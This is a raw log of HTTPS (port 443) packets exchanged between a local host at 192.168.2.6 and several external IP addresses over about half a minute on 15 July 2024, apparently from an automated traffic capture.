Jul 15, 2024 07:53:37.048508883 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 15, 2024 07:53:37.852737904 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:37.852854967 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:37.852929115 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:37.854608059 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:37.854651928 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:38.644107103 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:38.644246101 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:39.137255907 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:39.137315035 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:39.137821913 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:39.139892101 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:39.139945984 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:39.139964104 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:39.140096903 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:39.180507898 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:39.322602034 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:39.322823048 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:39.322961092 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:39.525485992 CEST	49710	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:39.525537014 CEST	443	49710	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.120209932 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.120259047 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.120337963 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.122129917 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.122148037 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.813294888 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.813345909 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.813426018 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.814196110 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.814218998 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.945384026 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.945497990 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.947545052 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.947561026 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.948333025 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.949851990 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.949918032 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.949925900 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:44.950038910 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:44.992579937 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.131953955 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.132149935 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.132222891 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.132669926 CEST	49712	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.132690907 CEST	443	49712	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.626969099 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.627070904 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.629529953 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.629540920 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.629827976 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.631961107 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.631961107 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.631983042 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.632124901 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.672599077 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.677269936 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:45.677301884 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:45.677364111 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:45.677922964 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:45.677988052 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:45.678056002 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:45.678528070 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:45.678561926 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:45.678765059 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:45.678786993 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:45.807820082 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.808120966 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.808178902 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.809076071 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:45.809097052 CEST	443	49717	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:45.809113979 CEST	49717	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:46.315853119 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.317962885 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.317982912 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.319586039 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.319641113 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.321260929 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.321943045 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.321980953 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.322664976 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.322781086 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.323127985 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.323184967 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.323580980 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.323595047 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.325896025 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.325977087 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.423321962 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 15, 2024 07:53:46.423330069 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.452935934 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.453001976 CEST	49673	443	192.168.2.6	173.222.162.64
Jul 15, 2024 07:53:46.453013897 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.564553976 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.721723080 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 15, 2024 07:53:46.764153004 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.764282942 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.764333963 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.765465975 CEST	49718	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.765485048 CEST	443	49718	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.773119926 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:46.820498943 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.941689968 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.941781998 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:46.941951036 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:47.013253927 CEST	49719	443	192.168.2.6	5.172.176.24
Jul 15, 2024 07:53:47.013319969 CEST	443	49719	5.172.176.24	192.168.2.6
Jul 15, 2024 07:53:47.880908012 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:47.880959034 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:47.881031990 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:47.926286936 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:47.926348925 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:47.926429987 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:47.927238941 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:47.927262068 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:47.929146051 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:47.929166079 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.175123930 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:48.175153971 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:48.175240993 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:48.176229954 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:48.176249027 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:48.323657036 CEST	443	49705	173.222.162.64	192.168.2.6
Jul 15, 2024 07:53:48.323786020 CEST	49705	443	192.168.2.6	173.222.162.64
Jul 15, 2024 07:53:48.623070955 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.623420954 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.623473883 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.623548031 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.624872923 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.624895096 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.625495911 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.625591040 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.625828028 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.625902891 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.629714012 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.629770994 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.630295038 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.630393028 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.630589962 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.630597115 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.715379000 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.765130043 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:48.765160084 CEST	443	49722	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:48.841135979 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:48.841581106 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:48.841599941 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:48.842597961 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:48.842658997 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:48.846724033 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:48.846795082 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:48.952547073 CEST	49722	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.017729998 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:49.017767906 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:49.126461029 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:49.257528067 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:49.257621050 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:49.257702112 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:49.259372950 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:49.259394884 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:49.357209921 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.357280016 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.357301950 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.357338905 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.357341051 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.357359886 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.357383013 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.357397079 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.357428074 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.357430935 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.357460976 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.424706936 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.464051008 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.464065075 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.464121103 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.464134932 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.464170933 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.464200974 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.464210033 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.464220047 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.464220047 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.464234114 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.464258909 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.575159073 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.575170040 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.575223923 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.575225115 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.575273991 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.575289965 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.575364113 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.575412035 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.579888105 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.579904079 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.579968929 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.579998970 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.580040932 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.583507061 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.583523035 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.586963892 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.587016106 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.587467909 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.587498903 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.692076921 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.692126036 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.692179918 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.692215919 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.692231894 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.695532084 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.695581913 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.695631027 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.695641994 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.695676088 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.697886944 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.697946072 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.697967052 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.697981119 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.698003054 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.700671911 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.700714111 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.700742006 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.700753927 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.700789928 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.703391075 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.703433037 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.703458071 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.703471899 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.703497887 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.705975056 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.706017017 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.706049919 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.706059933 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.706099033 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.749126911 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.749200106 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.749241114 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.749263048 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.749300003 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.778480053 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.778532982 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.778552055 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.778578997 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.778606892 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.778616905 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.778624058 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.778739929 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:49.779429913 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:49.923680067 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:49.923784971 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:50.019037008 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:50.019069910 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:50.020246983 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:50.043943882 CEST	49723	443	192.168.2.6	139.28.37.144
Jul 15, 2024 07:53:50.043994904 CEST	443	49723	139.28.37.144	192.168.2.6
Jul 15, 2024 07:53:50.131995916 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:50.867532969 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:50.912496090 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.057090044 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.057276011 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.057363987 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.057559967 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.057559967 CEST	49725	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.057606936 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.057637930 CEST	443	49725	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.099565029 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.099631071 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.099745989 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.100270987 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.100300074 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.763973951 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.764072895 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.853823900 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.853847027 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.854841948 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:51.857336044 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:51.904496908 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:52.047456980 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:52.047550917 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:52.047638893 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:52.294847012 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:52.294847012 CEST	49726	443	192.168.2.6	184.28.90.27
Jul 15, 2024 07:53:52.294881105 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:52.294891119 CEST	443	49726	184.28.90.27	192.168.2.6
Jul 15, 2024 07:53:52.653532028 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:52.653613091 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:52.653732061 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:52.654546976 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:52.654577971 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.466372967 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.466468096 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:53.468851089 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:53.468882084 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.469679117 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.471923113 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:53.471990108 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:53.472003937 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.472098112 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:53.516495943 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.646214962 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.646434069 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:53.646501064 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:53.646604061 CEST	49728	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:53.646630049 CEST	443	49728	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:55.228749037 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:55.228796959 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:55.228900909 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:55.230690002 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:55.230705976 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.497704983 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.497848034 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:56.503962994 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:56.503988981 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.504317045 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.507488966 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:56.507673025 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:56.507680893 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.508091927 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:56.552506924 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.684588909 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.684819937 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:56.684968948 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:56.704524994 CEST	49729	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:53:56.704552889 CEST	443	49729	40.113.103.199	192.168.2.6
Jul 15, 2024 07:53:58.740955114 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:58.741117001 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:53:58.741175890 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:58.805529118 CEST	49724	443	192.168.2.6	142.250.186.36
Jul 15, 2024 07:53:58.805560112 CEST	443	49724	142.250.186.36	192.168.2.6
Jul 15, 2024 07:54:04.639414072 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:04.639542103 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:04.639667988 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:04.640280008 CEST	49734	443	192.168.2.6	40.113.103.199
Jul 15, 2024 07:54:04.640320063 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.432600021 CEST	443	49734	40.113.103.199	192.168.2.6
Jul 15, 2024 07:54:05.432692051 CEST	49734	443	192.168.2.6	40.113.103.199
